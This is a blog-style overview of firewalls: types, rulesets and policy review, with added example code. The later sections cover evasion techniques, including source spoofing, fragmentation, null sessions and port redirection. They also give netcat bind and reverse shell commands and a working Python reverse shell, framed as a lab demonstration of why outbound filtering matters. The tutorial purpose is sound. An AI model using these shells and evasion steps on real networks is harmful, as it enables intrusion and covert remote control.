Saturday, October 8, 2011

Some information about Firewalls

What is a Firewall?

A system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in both hardware and software, or a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.



Types of Firewall:

Network-Level Firewalls: packet filters that decide on IP addresses, ports and TCP flags, one packet at a time.
Circuit-Level Firewalls: work at the session (TCP connection) level; they validate the handshake and then relay the circuit without looking at the payload.
Application-Level Firewalls: proxies that understand a specific protocol (HTTP, SMTP, ...) and can inspect and filter its content.
Stateful Multi-level Firewalls: track the state of every connection and combine packet, circuit and application checks.



Placement of the firewall is very important. Design choices that shape a firewall architecture:

Inbound and Outbound filtering (control traffic in both directions, not only what comes in)
Permissive or Restrictive policies (default allow with explicit denies, or default deny with explicit allows; restrictive is the safer baseline)
Context-based firewalls (decisions depend on connection state and protocol context, as in Cisco CBAC)
Zone-based firewall (ZBF: interfaces are grouped into zones and policy is written per zone pair)
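Added example (not from the original post): a restrictive, stateful ruleset written for nftables, the successor of the iptables mentioned below. The interface names (eth0 outside, eth1 inside) and the permitted ports are assumptions. It shows inbound and outbound filtering as separate chains, a restrictive input policy beside a permissive output policy, connection-tracking (stateful) rules, and a forward chain that acts like a zone pair:

```nft
#!/usr/sbin/nft -f
# Added example ruleset; interfaces and ports are assumed, adjust before use.
flush ruleset

table inet filter {
    chain input {
        # Restrictive policy: anything not explicitly accepted is dropped.
        type filter hook input priority 0; policy drop;

        iif "lo" accept
        # Stateful: replies to connections the firewall itself opened come back in.
        ct state established,related accept
        ct state invalid drop

        # Inbound filtering: SSH only from the inside interface, HTTPS from anywhere.
        iif "eth1" tcp dport 22 ct state new accept
        tcp dport 443 ct state new accept

        # Let ping through, rate-limited so it cannot be used to flood.
        icmp type echo-request limit rate 5/second accept
        icmpv6 type echo-request limit rate 5/second accept

        counter drop
    }

    chain forward {
        # Traffic passing through the firewall between zones (eth1 inside, eth0 outside).
        type filter hook forward priority 0; policy drop;
        ct state established,related accept
        # Inside hosts may open web and DNS connections outward; nothing new comes inward.
        iif "eth1" oif "eth0" tcp dport { 80, 443 } ct state new accept
        iif "eth1" oif "eth0" udp dport 53 accept
        counter drop
    }

    chain output {
        # Permissive policy for the firewall's own outgoing traffic (tighten in production).
        type filter hook output priority 0; policy accept;
    }
}
```

Load it with nft -f and check the counters with nft list ruleset: the "counter drop" lines show how much traffic the restrictive default is actually stopping, which is what a 90-day (or continuous) policy review should look at.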



Firewall in linux:
iptables (the standard netfilter front end), FireHOL (a rule generator on top of iptables), Firestarter (GUI)

Firewall in windows (home):
BlackICE (a personal firewall with intrusion detection for Windows desktops)


Firewall policy should be reviewed every 90 days as a minimum.
Better: make the review a continuous process.

Related data-protection terms (backup and recovery, not firewall features):
Electronic vaulting: data is copied at periodic intervals to an off-site location.
Remote journaling: transaction logs are sent to the remote site in (near) real time.
Disk shadowing: data is written to multiple disks.
Disk mirroring: the same writes are duplicated on a second local disk.


A circuit-level gateway works at the session level: it checks the TCP handshake and relays the connection without inspecting the payload.
NAT gateways are usually classed as circuit-level gateways (SOCKS is the classic example).

An application-level firewall (application gateway) acts as a proxy for a specific protocol and can ask the user for credentials before relaying the request.

To locate the firewall:
hping3 -S -c 2 -p 23 -n 172.16.16.100 // -S sends SYN probes, -p 23 is the target port, -c 2 sends two packets (without -c it keeps sending until interrupted), -n gives numeric output (no reverse DNS)

If a filtering device rejects the probe, it answers from its own address with an ICMP "administratively prohibited" message, which hping3 prints as "ICMP Packet filtered from ip=<firewall_ip> ...": that address is the firewall. A SYN/ACK (flags=SA) or RST/ACK (flags=RA) means the probe reached the host; no reply at all means the packet was silently dropped.
If ICMP messages are blocked, trace with TCP instead: tcptraceroute, hping3 -T (traceroute mode, e.g. hping3 -T -S -p 23 <target>), ...
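Added example (not from the original post): a small classifier that reads the output of one hping3 -S run and turns it into a verdict, extracting the firewall's address from the "ICMP Packet filtered from ip=" line. The sample outputs are constructed for the demo, not real captures, and the exact wording of hping3's lines is assumed to follow the common format shown; adapt the regexes if your version prints something different.

```python
import re

# Constructed sample outputs of "hping3 -S -c 2 -p 23 -n 172.16.16.100" (not real captures).
SAMPLE_FILTERED = """\
HPING 172.16.16.100 (eth0 172.16.16.100): S set, 40 headers + 0 data bytes
ICMP Packet filtered from ip=172.16.16.1 name=UNKNOWN
ICMP Packet filtered from ip=172.16.16.1 name=UNKNOWN

--- 172.16.16.100 hping statistic ---
2 packets transmitted, 0 packets received, 100% packet loss
"""

SAMPLE_OPEN = """\
HPING 172.16.16.100 (eth0 172.16.16.100): S set, 40 headers + 0 data bytes
len=46 ip=172.16.16.100 ttl=64 DF id=0 sport=23 flags=SA seq=0 win=5840 rtt=0.4 ms
len=46 ip=172.16.16.100 ttl=64 DF id=0 sport=23 flags=SA seq=1 win=5840 rtt=0.3 ms

--- 172.16.16.100 hping statistic ---
2 packets transmitted, 2 packets received, 0% packet loss
"""

SAMPLE_SILENT = """\
HPING 172.16.16.100 (eth0 172.16.16.100): S set, 40 headers + 0 data bytes

--- 172.16.16.100 hping statistic ---
2 packets transmitted, 0 packets received, 100% packet loss
"""

# A TCP reply line carries both the responder address and the TCP flags.
_TCP_REPLY = re.compile(r"\bip=(\S+)\s.*\bflags=([A-Z]+)")
# An ICMP error line names the device that generated it: that is the filter.
_ICMP_REPLY = re.compile(r"^ICMP (.+?) from ip=(\S+)", re.M)


def classify_hping3(output: str) -> dict:
    """Turn one hping3 -S run into a verdict on the probed port and the firewall.

    flags=SA            -> port open, probe reached the host
    flags=RA            -> port closed, probe reached the host (no filter on that port)
    ICMP ... from ip=X  -> a filtering device X rejected the probe (its address leaks)
    nothing at all      -> silently dropped (a DROP rule, or a dead host)
    """
    verdict = {"port": "unknown", "filtered_by": None, "responder": None}
    m = _TCP_REPLY.search(output)
    if m:
        verdict["responder"] = m.group(1)
        verdict["port"] = "open" if "S" in m.group(2) else "closed"
        return verdict
    m = _ICMP_REPLY.search(output)
    if m:
        verdict["port"] = "filtered"
        verdict["icmp_message"] = m.group(1)
        verdict["filtered_by"] = m.group(2)
        return verdict
    verdict["port"] = "dropped"
    return verdict


if __name__ == "__main__":
    for name, sample in (("filtered", SAMPLE_FILTERED), ("open", SAMPLE_OPEN), ("silent", SAMPLE_SILENT)):
        print(name, classify_hping3(sample))
```

Feed it the captured text (hping3 ... > probe.txt) rather than parsing by eye; the "dropped" verdict is the one to treat with suspicion, since it cannot tell a silent DROP rule from a host that is simply down, which is exactly the case where a TCP traceroute helps.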

Grabbing the banner
nc -vv 172.16.0.5 80
// connection succeeded!
HEAD / HTTP/1.0 // type this, then press Enter twice => we get the Server banner!

nc -vv mail.thehackernews.com 25 // SMTP: the server announces its banner as soon as you connect

Create custom packets to get the answer:

An nmap ACK scan does not tell us which ports are open; it tells us which ports are filtered. A stateless packet filter lets an unsolicited ACK through and the host answers with RST ("unfiltered"), while a stateful firewall drops it ("filtered"), so the scan maps the firewall's rules rather than the services.
nmap -sA 172.16.16.100

In windows:
net use \\192.168.0.23\IPC$ 1234 /u:administrator
establishes an SMB session to that host (here with password 1234 for administrator); with an empty user and password, net use \\192.168.0.23\IPC$ "" /u:"", it is the classic "null session".
net view \\172.16.90.35 // to list the shared folders

Port redirection:

Example: if SMTP is blocked, send it to a different (allowed) port on another host, and use that host as a port redirection facility that forwards the connection on to port 25 at the real destination.

Windows tool:
Foundstone FPipe

Port redirection only changes port numbers; a firewall that inspects the payload (application-level) still sees the real protocol and can block it.
There is also the less capable winpipe.

In Linux, use the rinetd tool.
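Added example (not from the original post, and not the code of rinetd or FPipe): a minimal TCP port redirector in Python that does what those tools do, plus a constructed echo service standing in for the "real" destination so the whole thing runs on localhost. The function and variable names are this example's own. Note how the relay copies bytes blindly: nothing about the protocol changes, which is why a payload-inspecting firewall still recognises SMTP arriving on port 80.

```python
import socket
import threading


def _pipe(src, dst):
    """Copy bytes src -> dst until EOF, then half-close dst so the peer sees EOF too."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay(client, target):
    """One redirected connection: open the onward leg, then pump both directions.
    Nothing is inspected or rewritten; only the port number the outer firewall sees changes."""
    try:
        upstream = socket.create_connection(target, timeout=5)
    except OSError:
        client.close()
        return
    upstream.settimeout(None)
    back = threading.Thread(target=_pipe, args=(upstream, client), daemon=True)
    back.start()
    _pipe(client, upstream)
    back.join()
    client.close()
    upstream.close()


def start_redirector(listen_port, target_host, target_port, listen_host="127.0.0.1"):
    """Listen on listen_host:listen_port and forward every TCP connection to
    target_host:target_port (the job rinetd and FPipe do). Returns the bound port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_relay, args=(client, (target_host, target_port)),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def start_echo_server(host="127.0.0.1"):
    """Constructed stand-in for the service behind the redirector: echoes everything
    it receives and closes when the client half-closes. Returns the bound port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(16)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                while True:
                    data = conn.recv(4096)
                    if not data:
                        break
                    conn.sendall(data)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo(payload=b"EHLO inside.example\r\n"):
    """Send payload through the redirector to the echo service and return what comes back."""
    echo_port = start_echo_server()
    redir_port = start_redirector(0, "127.0.0.1", echo_port)
    with socket.create_connection(("127.0.0.1", redir_port), timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)  # tell the chain we are done sending
        chunks = []
        while True:
            data = c.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    print(demo())
```

In real use you would bind the redirector on the allowed port (say 80) of the intermediate host and point it at port 25 of the mail server; the SMTP dialogue then passes the port-based filter untouched, and an application-level inspector reads an "EHLO" on port 80 and flags it.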

Spoof the source address (this is an hping3 feature; fping cannot spoof):
hping3 -1 -a 172.16.3.37 -C 8 192.168.12.2 // -a sets the spoofed source, -1 selects ICMP mode, -C 8 is ICMP type 8 (echo request); replies go to the spoofed address, not to you
To send fragmented packets add -f (e.g. hping3 -S -f -p 23 <target>), which can slip past filters that do not reassemble fragments before deciding.

Covert from inside:
Covert channel by giving yourself a shell over netcat.
nc -vvl 3030 -e /bin/bash
opens a netcat listener on port 3030 that hands the connection to bash (traditional netcat wants -l -p 3030, and -e is not available in every netcat build).
Then on the client:
nc -vv <ip address> 3030 // and you have its shell!

This is a bind shell: the inside host listens and the client connects in. If there is a NAT device or an inbound filter between client and server, that connection cannot be made. The usual answer is to turn it around into a reverse shell: listen on the outside host (nc -vvl 3030) and have the inside host connect out with nc -vv <outside ip> 3030 -e /bin/bash, which rides on an outbound connection the firewall allows.
The best option is socat, which does the same with a proper pty.
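Added example (not from the original post): the bind-versus-reverse point in code. The inside host dials out to a listener and executes the lines it is sent, so no inbound connection is ever needed; the listener plays the role of "nc -vvl <port>". It is written to run entirely on 127.0.0.1 for a lab; the END delimiter, the function names and the use of sh -c are this example's own choices.

```python
import socket
import subprocess
import threading

END = b"\x00"  # delimiter marking the end of one command's output (this demo's own framing)


def reverse_shell(attacker_host, attacker_port):
    """Runs on the INSIDE host: it dials OUT to the listener, so NAT and inbound
    filtering are not in the way. Each received line is run with sh -c and its
    output is sent back followed by END. Returns when the listener closes."""
    with socket.create_connection((attacker_host, attacker_port), timeout=10) as s:
        s.settimeout(None)
        buf = b""
        while True:
            data = s.recv(4096)
            if not data:
                return
            buf += data
            while b"\n" in buf:
                line, buf = buf.split(b"\n", 1)
                cmd = line.decode(errors="replace").strip()
                if not cmd:
                    continue
                result = subprocess.run(["sh", "-c", cmd], capture_output=True, timeout=30)
                s.sendall(result.stdout + result.stderr + END)


def start_listener(host="127.0.0.1", port=0):
    """Runs on the OUTSIDE host (what nc -vvl <port> does): bind and listen.
    Returns (listening socket, bound port); port 0 lets the OS pick one."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def run_commands(conn, commands):
    """Drive the connected shell: send each command, collect its output up to END."""
    outputs = []
    buf = b""
    for cmd in commands:
        conn.sendall(cmd.encode() + b"\n")
        while END not in buf:
            data = conn.recv(4096)
            if not data:
                raise ConnectionError("shell went away")
            buf += data
        out, buf = buf.split(END, 1)
        outputs.append(out)
    return outputs


def demo(commands=("echo firewall-test", "echo done")):
    """Full exchange on localhost: the inside host calls out, the listener drives it."""
    srv, port = start_listener()
    srv.settimeout(10)
    inside = threading.Thread(target=reverse_shell, args=("127.0.0.1", port), daemon=True)
    inside.start()  # the victim side initiates the TCP connection
    conn, _ = srv.accept()
    conn.settimeout(10)
    try:
        return run_commands(conn, commands)
    finally:
        conn.close()  # closing the connection is what makes reverse_shell() return
        srv.close()
        inside.join(timeout=5)


if __name__ == "__main__":
    for line in demo():
        print(line.decode(), end="")
```

From the firewall's point of view this is one outbound TCP connection from the inside host, indistinguishable at the packet-filter level from any other client connection; only egress filtering (restrictive outbound policy) or payload inspection catches it, which is the argument for filtering outbound traffic as well as inbound.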

Covert from outside:
HTTP tunneling: wrap the blocked protocol inside HTTP requests to a web port that the firewall allows.
In Windows: HTTPort
In Linux: an HTTP tunnel daemon such as GNU httptunnel (hts on the outside, htc on the inside)
(FPipe, listed here in the original note, is the Windows port redirector from above, not a Linux tool.)

This is an overview of firewalls; it is not a complete treatment, just an outline for people who work with them.


 

The Hacker News